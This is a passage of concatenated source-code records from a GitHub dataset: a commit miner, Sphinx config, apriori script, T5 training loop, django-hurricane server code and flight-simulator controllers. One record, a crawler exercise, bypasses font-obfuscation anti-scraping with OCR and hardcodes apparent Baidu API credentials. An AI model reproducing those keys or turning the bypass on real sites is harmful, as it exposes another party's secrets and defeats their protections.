(Atom(b\"ok\"),\n {\n Atom(b\"num_commits\"): num_commits,\n Atom(b\"user_commits_histogram\"): user_commits_histogram,\n Atom(b\"monthly_commits_histogram\"): monthly_commits_histogram\n })\n\ndef _count_commits(repo):\n count = 0\n for commit in repo.traverse_commits():\n count = count + 1\n return count\n\ndef _histogram_by_user(repo):\n histogram = {}\n for commit in repo.traverse_commits():\n author_name = commit.author.name.encode()\n if author_name in histogram:\n histogram[author_name] = histogram[author_name] + 1\n else:\n histogram[author_name] = 1\n return histogram\n\ndef _histogram_by_month(repo):\n histogram = {}\n for commit in repo.traverse_commits():\n year = commit.committer_date.year\n month = commit.committer_date.month\n if (year, month) in histogram:\n histogram[(year, month)] = histogram[(year, month)] + 1\n else:\n histogram[(year, month)] = 1\n return histogram\n","repo_name":"MachinesAreUs/repo_miner_py","sub_path":"lib/python/repo_miner.py","file_name":"repo_miner.py","file_ext":"py","file_size_in_byte":1568,"program_lang":"python","lang":"en","doc_type":"code","stars":1,"dataset":"github-code","pt":"37"} +{"seq_id":"43982754517","text":"import sphinx_rtd_theme\n\nimport jfscripts\n\nhtml_theme = \"sphinx_rtd_theme\"\nhtml_theme_path = [sphinx_rtd_theme.get_html_theme_path()]\n\nextensions = []\nextensions += [\"sphinx.ext.autodoc\"]\nextensions += [\"sphinx.ext.intersphinx\"]\nextensions += [\"sphinx.ext.viewcode\"]\nextensions += [\"sphinxarg.ext\"]\n\ntemplates_path = [\"_templates\"]\nsource_suffix = \".rst\"\n\nmaster_doc = \"index\"\n\nproject = \"jfscripts\"\ncopyright = \"2018, Josef Friedrich\"\nauthor = \"Josef Friedrich\"\nversion = jfscripts.__version__\nrelease = jfscripts.__version__\nlanguage = \"en\"\nexclude_patterns = [\"_build\", \"Thumbs.db\", \".DS_Store\"]\npygments_style = \"sphinx\"\ntodo_include_todos = False\nhtml_static_path = []\nhtmlhelp_basename = \"jfscriptsdoc\"\nautodoc_default_flags = [\n \"members\",\n \"undoc-members\",\n \"private-members\",\n \"show-inheritance\",\n]\nintersphinx_mapping = {\"python\": (\"https://docs.python.org/3\", None)}\n","repo_name":"Josef-Friedrich/jfscripts","sub_path":"doc/source/conf.py","file_name":"conf.py","file_ext":"py","file_size_in_byte":890,"program_lang":"python","lang":"en","doc_type":"code","stars":1,"dataset":"github-code","pt":"37"} +{"seq_id":"14314959627","text":"#!/usr/bin/python3\n\nfrom datetime import datetime\nimport argparse\nimport logging\nimport json\nimport csv\nimport pandas as pd\nfrom mlxtend.frequent_patterns import apriori\nfrom mlxtend.preprocessing import TransactionEncoder\n\nlogger = logging.getLogger(__name__)\nlogger.setLevel(logging.INFO)\n# create console handler and set level to debug\nch = logging.StreamHandler()\nch.setLevel(logging.INFO)\n\nfh = logging.FileHandler(r'extract_merge_commits_score.log')\n\n# create formatter\nformatter = logging.Formatter('%(asctime)s - %(levelname)s:%(name)s : %(message)s')\nfh.setFormatter(formatter)\n# add formatter to ch\nch.setFormatter(formatter)\n\n# add ch to logger\nlogger.addHandler(ch)\nlogger.addHandler(fh)\n\ndef trans_format(text):\n\treturn text.split(\",\")\n\ndef run_apriori():\n\tdf = pd.read_csv('../input/merge_refactoring_DB_B_simp.csv',sep=',')\n\tdf = df.iloc[:500,:]\n\tdel df['wasted']\n\tdel df['rework']\n\tprint(df.describe)\n\tlist_transactions = []\n\t# creating a list of dataframe columns\n\tcolumns = list(df)\n\tfor i in range(0,len(df)):\n \t\tdata = \"\" \n \t\tfor col_name in columns:\n\t\t\t data += col_name + '=' + str(df[col_name][i]) + ','\n \t\tif data:\n\t\t\t data = data[:-1]\n\t\t\t list_transactions.append(data)\n\tdf_apriori = pd.DataFrame(list_transactions,columns=['Transaction'])\n\n\t#Preparar registros para o Apriori\n\tdf_apriori['Transaction_list'] = df_apriori['Transaction'].apply(trans_format)\n\tte = TransactionEncoder()\n\tte_ary = te.fit(df_apriori['Transaction_list']).transform(df_apriori['Transaction_list'])\n\tte_ary\n\t#Formatando como DataFrame\n\tdf_apriori_rules = pd.DataFrame(te_ary, columns=te.columns_)\n\tprint(df_apriori_rules)\n\t#Rodar o apriori\n\tassociation_rules = apriori(df_apriori_rules, min_support=0.7, use_colnames=True)\n\toutput = pd.DataFrame(association_rules)\n\tprint(output)\n\t# min_confidence=0.2, min_lift=3, min_length=2\n\ndef main():\t\t\n\trun_apriori()\n\t\nif __name__ == '__main__':\n\tmain()","repo_name":"gems-uff/refactoring-merge","sub_path":"src/Auxiliar/apriori.py","file_name":"apriori.py","file_ext":"py","file_size_in_byte":1902,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"37"} +{"seq_id":"39307703895","text":"import wandb \nimport torch\nfrom tqdm import tqdm\n\ndef single_epoch_train(\n model, \n train_loader, \n optimizer, \n accelerator=False,\n scheduler=False, \n accumulation_step=4,\n device=\"cuda\"\n ):\n\n total_loss = 0.0\n for idx,batch in tqdm(enumerate(train_loader)):\n\n src_input_ids, src_attention_mask, tgt_input_ids, tgt_attention_mask = (\n batch['src_input_ids'].to(device),\n batch['src_attention_mask'].to(device),\n batch['tgt_input_ids'].to(device),\n batch['tgt_attention_mask'].to(device)\n )\n \n outputs = model(\n input_ids = src_input_ids,\n attention_mask = src_attention_mask,\n labels = tgt_input_ids,\n decoder_attention_mask = tgt_attention_mask\n )\n\n loss = outputs.loss / accumulation_step\n total_loss += loss.detach().float()\n\n accelerator.backward(loss)\n\n #gradient accumulation\n if (idx % accumulation_step == 0) or((idx + 1) == len(train_loader)): \n optimizer.step()\n optimizer.zero_grad()\n\n train_epoch_loss = total_loss / len(train_loader)\n train_ppl = torch.exp(train_epoch_loss)\n wandb.log({\"Train PPL\": train_ppl})\n \ndef single_epoch_test(\n model, \n test_loader, \n device=\"cuda\"\n ):\n\n total_loss = 0.0\n for idx,batch in tqdm(enumerate(test_loader)):\n\n src_input_ids, src_attention_mask, tgt_input_ids, tgt_attention_mask = (\n batch['src_input_ids'].to(device),\n batch['src_attention_mask'].to(device),\n batch['tgt_input_ids'].to(device),\n batch['tgt_attention_mask'].to(device)\n )\n \n outputs = model(\n input_ids = src_input_ids,\n attention_mask = src_attention_mask,\n labels = tgt_input_ids,\n decoder_attention_mask = tgt_attention_mask\n )\n\n loss = outputs.loss\n total_loss += loss.detach().float()\n\n test_epoch_loss = total_loss / len(test_loader)\n test_ppl = torch.exp(test_epoch_loss)\n wandb.log({\"Test PPL\": test_ppl})\n","repo_name":"guijinSON/finFlan_T5","sub_path":"train.py","file_name":"train.py","file_ext":"py","file_size_in_byte":2120,"program_lang":"python","lang":"en","doc_type":"code","stars":4,"dataset":"github-code","pt":"37"} +{"seq_id":"18796112200","text":"import re\nimport requests\nfrom PIL import Image\nfrom PIL import ImageFont\nfrom PIL import ImageDraw\nfrom fontTools.ttLib import ttFont\nfrom bs4 import BeautifulSoup as bs\nfont = ttFont.TTFont('font.ttf')\n# print(font.getReverseGlyphMap())\n# print(font.getGlyphNames())\n# print(font.getGlyphOrder())\nbestcmap = font.getBestCmap()\n#{38006: 'glyph00006', 38287: 'glyph00004', 39228: 'glyph00003', 39499: 'glyph00007', 40506: 'glyph00010', 40611: 'glyph00002', 40804: 'glyph00008', 40850: 'glyph00001', 40868: 'glyph00005', 40869: 'glyph00009'}\n#key转换成十六进制,然后0x换成\\\\u, 最后.encode().decode('escape-unicode'),就能在画布上用设置好的字体画出对应的字符\nprint(bestcmap)\nkk = []\nfor k in bestcmap:\n key = hex(k)\n print(key)\n kk.append(str(key).replace('0x','\\\\u').encode().decode('unicode-escape'))\nprint(kk) #['鑶', '閏', '餼', '驋', '鸺', '麣', '齤', '龒', '龤', '龥']\nok_list = ['\\\\u'+str(hex(i))[2:] for i in bestcmap.keys()]\n#创建画布\n# img = Image.new('RGB', (800,800), color=(255,255,255))\n# #创建画笔\n# img_draw = ImageDraw.Draw(img)\n# # 创建字体\n# img_font = ImageFont.truetype('./font.ttf', 60) #字体大小40\n# # 只有10个数字,一行画完\n# line_s = ''.join(kk)\n# print(line_s)\n# img_draw.text((20, 45), line_s, fill=1, font=img_font)\n# img.save('tu11.jpg')\n\"\"\"============================================================\"\"\"\n#识别上面保存的图片里的文字\nfrom aip import AipOcr\n\"\"\" 你的 APPID AK SK \"\"\"\nAPP_ID = '28067874'\nAPI_KEY = 'l5BmOn6geHb2sw3BhS0nMylL'\nSECRET_KEY = 'hoXHVYoEm7qNoVdqdcIxMrIPUiM0fkRE'\n\nclient = AipOcr(APP_ID, API_KEY, SECRET_KEY)\n# 字体转换到图片时可以尝试几种字体大小(行索引那里,然后测试网页转换的字体正确率怎么样\nwith open('./tu11.jpg', 'rb') as f:\n r = client.basicGeneral(f.read())\nprint(r)\nresult_list = []\nfor item in r['words_result']:\n # print(item) #{'words': '3756480291'}\n result_list.extend(item['words'])\nprint(result_list)\n#和字体文件中的字符创建映射\ndic = dict(zip(ok_list, result_list))\nprint(dic)\n\"\"\"=============================================================================\"\"\"\n#获取网页源代码替换\nurl = 'http://bikongge.com/chapter_1/font_3/index.html'\nresp = requests.get(url)\nresp.encoding = 'utf-8'\npage_source = resp.text\n#替换字符 k是key\nfor k in dic:\n v = dic[k]\n kk = k.replace('\\\\u', '&#x')+';'\n page_source = page_source.replace(kk, v)\nprint(page_source)","repo_name":"konatax/crawler","sub_path":"bikongge/03_字体反爬/提取xml字符形状.py","file_name":"提取xml字符形状.py","file_ext":"py","file_size_in_byte":2501,"program_lang":"python","lang":"en","doc_type":"code","stars":4,"dataset":"github-code","pt":"37"} +{"seq_id":"6290773105","text":"import asyncio\nimport concurrent.futures\nimport signal\nimport sys\nimport time\nimport traceback\nfrom typing import Callable, Optional\n\nimport pkg_resources # type: ignore\nimport tornado\nfrom django.conf import settings\nfrom django.core.management import call_command\nfrom django.db import connections\nfrom django.db.migrations.executor import MigrationExecutor\n\nfrom hurricane.metrics import (\n RequestCounterMetric,\n ResponseTimeAverageMetric,\n StartupTimeMetric,\n registry,\n)\nfrom hurricane.server.django import (\n DjangoHandler,\n DjangoLivenessHandler,\n DjangoReadinessHandler,\n DjangoStartupHandler,\n DjangoStaticFilesHandler,\n PrometheusHandler,\n)\nfrom hurricane.server.loggers import access_log, logger\nfrom hurricane.webhooks import StartupWebhook\nfrom hurricane.webhooks.base import WebhookStatus\n\nEXECUTOR = None\n\n\nclass HurricaneApplication(tornado.web.Application):\n def __init__(self, *args, **kwargs):\n self.collect_metrics = True\n if \"metrics\" in kwargs:\n self.collect_metrics = kwargs[\"metrics\"]\n global EXECUTOR\n if EXECUTOR is None:\n EXECUTOR = concurrent.futures.ThreadPoolExecutor()\n self.executor = EXECUTOR\n super(HurricaneApplication, self).__init__(*args, **kwargs)\n\n def log_request(self, handler: tornado.web.RequestHandler) -> None:\n \"\"\"Writes a completed HTTP request to the logs.\"\"\"\n if handler.get_status() < 400:\n log_method = access_log.info\n elif handler.get_status() < 500:\n log_method = access_log.warning\n else:\n log_method = access_log.error\n request_time = 1000.0 * handler.request.request_time()\n log_method(\n \"%d %s %.2fms\",\n handler.get_status(),\n handler._request_summary(),\n request_time,\n )\n if self.collect_metrics:\n RequestCounterMetric.increment()\n ResponseTimeAverageMetric.add_value(request_time)\n\n\nclass HurricaneProbeApplication(HurricaneApplication):\n def log_request(self, handler: tornado.web.RequestHandler) -> None:\n \"\"\"Writes a completed HTTP probe request to the logs.\"\"\"\n if getattr(settings, \"LOG_PROBES\", False):\n super(HurricaneProbeApplication, self).log_request(handler) # type: ignore\n return\n\n\ndef make_probe_server(options, check_func):\n \"\"\"create probe route application\"\"\"\n handlers = [\n (\n options[\"liveness_probe\"],\n DjangoLivenessHandler,\n {\n \"check_handler\": check_func,\n \"webhook_url\": options[\"webhook_url\"],\n \"max_lifetime\": options[\"max_lifetime\"],\n },\n ),\n (\n options[\"readiness_probe\"],\n DjangoReadinessHandler,\n {\n \"check_handler\": check_func,\n \"req_queue_len\": options[\"req_queue_len\"],\n \"webhook_url\": options[\"webhook_url\"],\n },\n ),\n (options[\"startup_probe\"], DjangoStartupHandler),\n ]\n if with_metrics(options):\n handlers.append((options[\"metrics_path\"], PrometheusHandler))\n return HurricaneProbeApplication(handlers, debug=options[\"debug\"], metrics=False)\n\n\ndef with_metrics(options):\n return \"no_metrics\" not in options or not options[\"no_metrics\"]\n\n\ndef make_http_server(options, check_func, include_probe=False):\n \"\"\"create all routes for this application\"\"\"\n if include_probe:\n handlers = [\n (\n options[\"liveness_probe\"],\n DjangoLivenessHandler,\n {\n \"check_handler\": check_func,\n \"webhook_url\": options[\"webhook_url\"],\n \"max_lifetime\": options[\"max_lifetime\"],\n },\n ),\n (\n options[\"readiness_probe\"],\n DjangoReadinessHandler,\n {\n \"check_handler\": check_func,\n \"req_queue_len\": options[\"req_queue_len\"],\n \"webhook_url\": options[\"webhook_url\"],\n },\n ),\n (options[\"startup_probe\"], DjangoStartupHandler),\n ]\n if with_metrics(options):\n handlers.append((options[\"metrics_path\"], PrometheusHandler))\n else:\n handlers = []\n # if static file serving is enabled\n if options[\"static\"]:\n logger.info(\n f\"Serving static files under {settings.STATIC_URL} from {settings.STATIC_ROOT or ''}\"\n )\n if settings.DEBUG and \"django.contrib.staticfiles\" in settings.INSTALLED_APPS:\n handlers.append(\n (\n f\"{settings.STATIC_URL}(.*)\",\n DjangoStaticFilesHandler,\n )\n )\n else:\n handlers.append(\n (\n f\"{settings.STATIC_URL}(.*)\",\n tornado.web.StaticFileHandler,\n {\"path\": settings.STATIC_ROOT},\n )\n )\n # if media file serving is enabled\n if options[\"media\"]:\n logger.info(\n f\"Serving media files under {settings.MEDIA_URL} from {settings.MEDIA_ROOT}\"\n )\n handlers.append(\n (\n f\"{settings.MEDIA_URL}(.*)\",\n tornado.web.StaticFileHandler,\n {\"path\": settings.MEDIA_ROOT},\n )\n )\n\n # append the django routing system\n handlers.append((\".*\", DjangoHandler))\n return HurricaneApplication(\n handlers, debug=options[\"debug\"], metrics=not options.get(\"no_metrics\", False)\n )\n\n\ndef make_http_server_and_listen(\n start_time: float, options: dict, check: Callable, include_probe: bool\n) -> None:\n logger.info(f\"Starting HTTP Server on port {options['port']}\")\n django_application = make_http_server(options, check, include_probe)\n django_application.listen(options[\"port\"])\n StartupWebhook().run(\n url=options[\"webhook_url\"] or None, status=WebhookStatus.SUCCEEDED\n )\n end_time = time.time()\n time_elapsed = end_time - start_time\n # if startup time metric value is set - startup process is finished\n StartupTimeMetric.set(time_elapsed)\n if with_metrics(options):\n hurricane_dist_version = pkg_resources.get_distribution(\n \"django-hurricane\"\n ).version\n registry.metrics[\"hurricane\"].set(\n {\n \"version\": hurricane_dist_version,\n \"startup_time_seconds\": str(round(time_elapsed, 5)),\n \"server_port\": str(options[\"port\"]),\n \"serve_static\": \"true\" if options[\"static\"] else \"false\",\n \"serve_media\": \"true\" if options[\"media\"] else \"false\",\n \"probe_port\": str(options[\"probe_port\"]),\n \"commands\": \",\".join(\n [item for row in options.get(\"command\", []) for item in row]\n if options.get(\"command\")\n else \"\"\n ),\n }\n )\n logger.info(f\"Startup time is {time_elapsed} seconds\")\n\n\ndef command_task(\n commands: list,\n webhook_url: Optional[str] = None,\n loop: Optional[asyncio.unix_events.SelectorEventLoop] = None,\n) -> None:\n logger.info(\"Starting execution of management commands\")\n for command in commands:\n # split a command string to get command options\n command_split = command[0].split()\n logger.info(\n f\"Starting execution of command {command_split[0]} with arguments {command_split[1:]}\"\n )\n start_time_command = time.time()\n # call management command\n try:\n call_command(*command_split)\n except Exception as e:\n logger.error(e)\n error_trace = traceback.format_exc()\n logger.info(\"Webhook with a status failed has been initiated\")\n # webhook is registered and run in a new thread, not blocking the process\n StartupWebhook().run(\n url=webhook_url or None,\n error_trace=error_trace,\n close_loop=True,\n status=WebhookStatus.FAILED,\n loop=loop,\n )\n raise e\n\n end_time_command = time.time()\n\n logger.info(\n f\"Command {command_split[0]} was executed in {end_time_command - start_time_command} seconds\"\n )\n\n\ndef check_databases():\n for db_name in connections:\n connection = connections[db_name]\n cursor = connection.cursor()\n try:\n cursor.execute(\"SELECT (1)\")\n logger.info(\"Database was checked successfully\")\n cursor.close()\n return True\n except Exception as e:\n logger.warning(f\"Database command execution has failed with {e}\")\n cursor.close()\n return False\n\n\ndef count_migrations():\n number_of_migrations = 0\n for db_name in connections:\n connection = connections[db_name]\n if hasattr(connection, \"prepare_database\"):\n connection.prepare_database()\n executor = MigrationExecutor(connection)\n targets = executor.loader.graph.leaf_nodes()\n number_of_migrations += len(executor.migration_plan(targets))\n return number_of_migrations\n\n\ndef signal_handler(signal, frame):\n logger.error(\"\\nprogram exiting gracefully\")\n sys.exit(0)\n\n\nsignal.signal(signal.SIGINT, signal_handler)\n\n\ndef check_db_and_migrations(\n webhook_url: Optional[str] = None,\n loop: Optional[asyncio.unix_events.SelectorEventLoop] = None,\n apply_migration: bool = False,\n):\n try:\n while check_databases():\n number_of_migrations = count_migrations()\n\n logger.info(f\"There are {number_of_migrations} pending migrations\")\n if number_of_migrations == 0:\n logger.info(\"No pending migrations\")\n break\n\n if apply_migration:\n logger.info(\"Applying migrations\")\n call_command(\"migrate\")\n\n except Exception as e:\n error_trace = traceback.format_exc()\n logger.info(\"Webhook with a status warning has been initiated\")\n\n StartupWebhook().run(\n url=webhook_url or None,\n error_trace=error_trace,\n close_loop=True,\n status=WebhookStatus.WARNING,\n loop=loop,\n )\n raise e\n\n\ndef sanitize_probes(options):\n # sanitize probe paths\n options[\"liveness_probe\"] = f\"/{options['liveness_probe'].lstrip('/')}\".replace(\n \" \", \"\"\n )\n options[\"readiness_probe\"] = f\"/{options['readiness_probe'].lstrip('/')}\".replace(\n \" \", \"\"\n )\n options[\"startup_probe\"] = f\"/{options['startup_probe'].lstrip('/')}\".replace(\n \" \", \"\"\n )\n\n representations = {\n \"liveness_probe\": options[\"liveness_probe\"],\n \"readiness_probe\": options[\"readiness_probe\"],\n \"startup_probe\": options[\"startup_probe\"],\n }\n # adding optional / to the regular expression of probe handler\n options[\"liveness_probe\"] = add_trailing_slash(options, \"liveness_probe\")\n options[\"readiness_probe\"] = add_trailing_slash(options, \"readiness_probe\")\n options[\"startup_probe\"] = add_trailing_slash(options, \"startup_probe\")\n return options, representations\n\n\ndef add_trailing_slash(options, probe_name):\n # adding optional / to the regular expression of probe handler\n probe = options[probe_name]\n if probe[-1] == \"/\":\n return probe + \"{0,1}\"\n else:\n return probe + \"/{0,1}\"\n\n\ndef static_watch():\n try:\n logger.info(\"Collecting static as static file changed\")\n call_command(\"collectstatic\", interactive=False, clear=True)\n except Exception as e:\n logger.error(e)\n","repo_name":"django-hurricane/django-hurricane","sub_path":"hurricane/server/__init__.py","file_name":"__init__.py","file_ext":"py","file_size_in_byte":11833,"program_lang":"python","lang":"en","doc_type":"code","stars":67,"dataset":"github-code","pt":"37"} +{"seq_id":"6405186876","text":"\"\"\"Classes defining controllers for simulated aircraft.\"\"\"\n\nimport pynput\nimport inputs\nimport copy\n\nimport numpy as np\nimport multiprocessing as mp\n\nfrom abc import abstractmethod\nfrom math import degrees, radians\n\nclass BaseController:\n \"\"\"An abstract aircraft controller class.\n \"\"\"\n\n def __init__(self, control_dict, quit_flag, view_flag, pause_flag, data_flag, enable_interface, control_output):\n\n # Initialize\n self._UI_inputs = {}\n self._keys_pressed = []\n self._input_dict = control_dict\n\n # Store flags\n self._data_flag = data_flag\n self._view_flag = view_flag\n self._quit_flag = quit_flag\n self._pause_flag = pause_flag\n\n # Set up user interface\n self._enable_interface = enable_interface\n if self._enable_interface:\n # Key press listener function\n def on_press(key):\n\n # Get key\n try:\n k = key.char\n except:\n k = key.name\n\n # Check action\n\n # Toggle flight data\n if k == 'i':\n self._data_flag.value = not self._data_flag.value\n\n # Toggle pause\n elif k == 'p':\n self._pause_flag.value = not self._pause_flag.value\n\n # Quit\n elif k == 'q':\n self._quit_flag.value = not self._quit_flag.value\n\n # Toggle view\n elif k == 'space':\n self._view_flag.value = (self._view_flag.value+1)%3\n\n # Store other keystroke\n elif k in ['w', 's', 'a', 'd', 'left', 'right', 'up', 'down']:\n self._keys_pressed.append(k)\n\n # Key release listener function\n def on_release(key):\n\n # Get key\n try:\n k = key.char\n except:\n k = key.name\n\n # Remove those from the list\n if k in ['w', 's', 'a', 'd', 'left', 'right', 'up', 'down'] and k in self._keys_pressed:\n self._keys_pressed = list(filter(lambda a: a != k, self._keys_pressed))\n\n # Initialize keyboard listener\n self._keyboard_listener = pynput.keyboard.Listener(on_press=on_press, on_release=on_release)\n self._keyboard_listener.start()\n\n # Get control names\n self._controls = []\n for key, value in self._input_dict.items():\n self._controls.append(key)\n self._num_controls = len(self._controls)\n\n # Initialize storage\n if control_output is not None:\n\n # Check for csv\n if \".csv\" not in control_output:\n raise IOError(\"Control output file must be .csv\")\n\n # Open file\n self._write_controls = True\n self._control_output = open(control_output, 'w')\n else:\n self._write_controls = False\n\n # Store mapping\n if control_output is not None or isinstance(self, TimeSequenceController):\n self._column_mapping = {}\n self._output_cols = [\"\"]*self._num_controls\n for key, value in self._input_dict.items():\n try:\n self._column_mapping[key] = value[\"column_index\"]\n self._output_cols[self._column_mapping[key]-1] = key\n except KeyError:\n if control_output is not None:\n raise IOError(\"'column_index' must be specified for each control if the controls are to be output.\")\n else:\n raise IOError(\"'column_index' must be specified for each control if a time-sequence controller is used.\")\n\n\n def finalize(self):\n if self._enable_interface:\n self._keyboard_listener.stop()\n if self._write_controls:\n self._control_output.close()\n if isinstance(self, JoystickController):\n self._joy_listener.kill()\n\n\n def get_control_names(self):\n \"\"\"Returns the names of the controls handled by this controller.\"\"\"\n return self._controls\n\n\n def get_input(self):\n \"\"\"Returns a dictionary of inputs from the user for controlling pause, view, etc.\"\"\"\n\n inputs = copy.deepcopy(self._UI_inputs)\n self._UI_inputs= {}\n return inputs\n\n\n def output_controls(self, t, control_dict):\n # Writes controls to csv\n if self._write_controls:\n line = [\"{0}\".format(t)]\n for i in range(self._num_controls):\n line.append(\",{0}\".format(control_dict[self._output_cols[i]]))\n line.append(\"\\n\")\n self._control_output.write(\"\".join(line))\n\n \n @abstractmethod\n def get_control(self, t, state_vec, prev_controls):\n \"\"\"ABSTRACT METHOD. Returns the controls based on the inputted state.\n\n Parameters\n ----------\n t : float\n Time index in seconds.\n\n state_vec : list\n State vector of the aircraft being controlled. It is given in the form\n\n [u, v, w, p, q, r, x, y, z, e0, ex, ey, ez]\n\n where u, v, and w are the body-fixed velocity components, p, q, and r are\n the body-fixed angular velocity components, x, y, and z are the Earth-fixed\n position coordinates, and e0, ex, ey, and ez are the quaternion encoding\n a rotation from the local NED frame to the body-fixed frame.\n\n prev_controls : dict\n Previous control values.\n\n Returns\n -------\n control_state : dict\n Updated control state.\n \"\"\"\n pass\n\n\n def get_limits(self):\n \"\"\"Returns the control limits for this controller.\"\"\"\n\n # This will only work if the limits are defined\n try:\n limits = {}\n for name in self._controls:\n \n # Get max deflections for angular controls\n if self._angular_control[name]:\n limits[name] = (-self._control_limits[name], self._control_limits[name])\n\n # Other controls just go between 0.0 and 1.0\n else:\n limits[name] = (0.0, 1.0)\n\n return limits\n\n except:\n return None\n\n\nclass NoController(BaseController):\n \"\"\"A controller that holds constant the initial controls.\n\n Parameters\n ----------\n control_dict : dict\n A dictionary of control names and specifications.\n \"\"\"\n\n def __init__(self, control_dict, quit_flag, view_flag, pause_flag, data_flag, enable_interface, control_output):\n super().__init__(control_dict, quit_flag, view_flag, pause_flag, data_flag, enable_interface, control_output)\n\n def get_control(self, t, state_vec, prev_controls):\n return prev_controls\n\n\nclass JoystickController(BaseController):\n \"\"\"A controller for controlling a 4-channel aircraft using a standard joystick.\n\n Parameters\n ----------\n control_dict : dict\n A dictionary of control names and specifications.\n \"\"\"\n\n def __init__(self, control_dict, quit_flag, view_flag, pause_flag, data_flag, enable_interface, control_output):\n super().__init__(control_dict, quit_flag, view_flag, pause_flag, data_flag, enable_interface, control_output)\n\n # Check for joystick\n self._avail_pads = inputs.devices.gamepads\n if len(self._avail_pads) == 0:\n raise RuntimeError(\"Couldn't find any joysticks!\")\n elif len(self._avail_pads) > 1:\n raise RuntimeError(\"More than one joystick detected!\")\n\n # Set off listener\n self._manager = mp.Manager()\n self._joy_def = self._manager.list()\n self._joy_def[:] = [0.0]*4\n self._throttle_perturbed = self._manager.Value('i', 0)\n self._trim_up_pressed = self._manager.Value('i', 0)\n self._trim_dn_pressed = self._manager.Value('i', 0)\n self._dn_cycles_held = 0\n self._up_cycles_held = 0\n self._trim_tab = 0.0\n self._joy_listener = mp.Process(target=joystick_listener, args=(self._joy_def, self._quit_flag, self._throttle_perturbed, self._trim_dn_pressed, self._trim_up_pressed))\n self._joy_listener.start()\n\n # Get mapping and limits\n self._axis_mapping = {}\n self._control_limits = {}\n self._angular_control = {} # True for angular deflection, False for 0 to 1.\n self._tied_to_trim_tab = {}\n for key, value in control_dict.items():\n\n # See if limits have been defined\n limits = value.get(\"max_deflection\", None)\n if limits is not None: # The limits are defined\n self._control_limits[key] = limits\n self._angular_control[key] = True\n else:\n self._angular_control[key] = False\n \n # Get the mapping\n self._axis_mapping[key] = value[\"input_axis\"]\n self._tied_to_trim_tab[key] = value.get(\"trim_tab\", False)\n\n # Set variable for knowing if the user has perturbed from the trim state yet\n self._perturbed_set = False\n self._perturbed = False\n self._joy_init = [0.0]*4\n\n\n def get_control(self, t, state_vec, prev_controls):\n \"\"\"Returns the controls based on the inputted state and keyboard/joystick inputs.\n\n Parameters\n ----------\n state_vec : list\n State vector of the entity being controlled.\n\n prev_controls : dict\n Previous control values.\n\n Returns\n -------\n controls : dict\n Dictionary of controls.\n \"\"\"\n\n # Set perturbation condition\n if not self._perturbed_set:\n self._joy_init[:] = self._joy_def[:]\n self._perturbed_set = True\n\n # Check if we're perturbed from the start control set\n if not self._perturbed:\n if (np.array(self._joy_def) != np.array(self._joy_init)).any():\n self._perturbed = True\n else:\n return prev_controls # No point in parsing things if nothing's changed\n\n # Update trim tab\n if self._trim_dn_pressed.value:\n self._dn_cycles_held += 1\n self._trim_tab -= 0.000005*self._dn_cycles_held\n else:\n self._dn_cycles_held = 0\n\n if self._trim_up_pressed.value:\n self._up_cycles_held += 1\n self._trim_tab += 0.000005*self._up_cycles_held\n else:\n self._up_cycles_held = 0\n\n # Parse new controls\n control_state = copy.deepcopy(prev_controls)\n for name in self._controls:\n if not self._throttle_perturbed.value and self._axis_mapping[name] == 3:\n continue\n elif self._angular_control[name]:\n setting = (self._joy_def[self._axis_mapping[name]]**3)*-self._control_limits[name]+self._tied_to_trim_tab[name]*self._trim_tab\n else:\n setting = (-self._joy_def[self._axis_mapping[name]]+1.)*0.5+self._tied_to_trim_tab[name]*self._trim_tab\n control_state[name] = setting\n\n return control_state\n\n\nclass KeyboardController(BaseController):\n \"\"\"A controller for controlling an aircraft with ailerons, elevators, and rudder, and a throttle using a standard keyboard.\n\n Parameters\n ----------\n control_dict : dict\n A dictionary of control names and specifications.\n \"\"\"\n\n def __init__(self, control_dict, quit_flag, view_flag, pause_flag, data_flag, enable_interface, control_output):\n super().__init__(control_dict, quit_flag, view_flag, pause_flag, data_flag, enable_interface, control_output)\n\n # Initialize user inputs\n self._UP = False\n self._DOWN = False\n self._RIGHT = False\n self._LEFT = False\n self._WW = False\n self._SS = False\n self._AA = False\n self._DD = False\n\n # Get mapping and limits\n self._axis_mapping = {}\n self._control_limits = {}\n self._angular_control = {} # True for angular deflection, False for 0 to 1.\n for key, value in control_dict.items():\n\n # See if limits have been defined\n limits = value.get(\"max_deflection\", None)\n if limits is not None: # The limits are defined\n self._control_limits[key] = limits\n self._angular_control[key] = True\n else:\n self._angular_control[key] = False\n \n # Get the mapping\n self._axis_mapping[key] = value[\"input_axis\"]\n \n # Store reverse mapping\n self._control_reverse_mapping = [0]*4\n for key, value in self._axis_mapping.items():\n self._control_reverse_mapping[value] = key\n\n # Store control names\n self._controls.append(key)\n\n # Set variable for knowing if the user has perturbed from the trim state yet\n self._perturbed = False\n\n\n def get_control(self, t, state_vec, prev_controls):\n \"\"\"Returns the controls based on the inputted state and keyboard/joystick inputs.\n\n Parameters\n ----------\n state_vec : list\n State vector of the entity being controlled.\n\n prev_controls : dict\n Previous control values.\n\n Returns\n -------\n controls : dict\n Dictionary of controls.\n \"\"\"\n\n # Check for perturbation\n if not self._perturbed and len(self._keys_pressed) > 0:\n self._perturbed = True\n\n if self._perturbed:\n # Parse new controls\n control_state = {}\n for i in range(4):\n name = self._control_reverse_mapping[i]\n defl = 0.0\n\n # Get axis input\n if i == 0: # Input roll axis\n if 'left' in self._keys_pressed and not 'right' in self._keys_pressed:\n defl = 1.0\n elif not 'left' in self._keys_pressed and 'right' in self._keys_pressed:\n defl = -1.0\n\n elif i == 1: # Input pitch axis\n if 'up' in self._keys_pressed and not 'down' in self._keys_pressed:\n defl = 1.0\n elif not 'up' in self._keys_pressed and 'down' in self._keys_pressed:\n defl = -1.0\n\n elif i == 2: # Input yaw axis\n if 'a' in self._keys_pressed and not 'd' in self._keys_pressed:\n defl = 1.0\n elif not 'a' in self._keys_pressed and 'd' in self._keys_pressed:\n defl = -1.0\n\n else: # Input throttle axis\n if 'w' in self._keys_pressed and not 's' in self._keys_pressed:\n defl = 1.0\n elif not 'w' in self._keys_pressed and 's' in self._keys_pressed:\n defl = -1.0\n\n # Apply deflection\n if self._angular_control[name]:\n sensitivity = 0.01\n control_state[name] = min(self._control_limits[name], max(prev_controls[name]+sensitivity*defl, -self._control_limits[name]))\n else:\n sensitivity = 0.001\n control_state[name] = min(1.0, max(prev_controls[name]+defl*sensitivity, 0.0))\n\n else: # Otherwise, send back the previous controls\n control_state = copy.deepcopy(prev_controls)\n\n return control_state\n\n\nclass 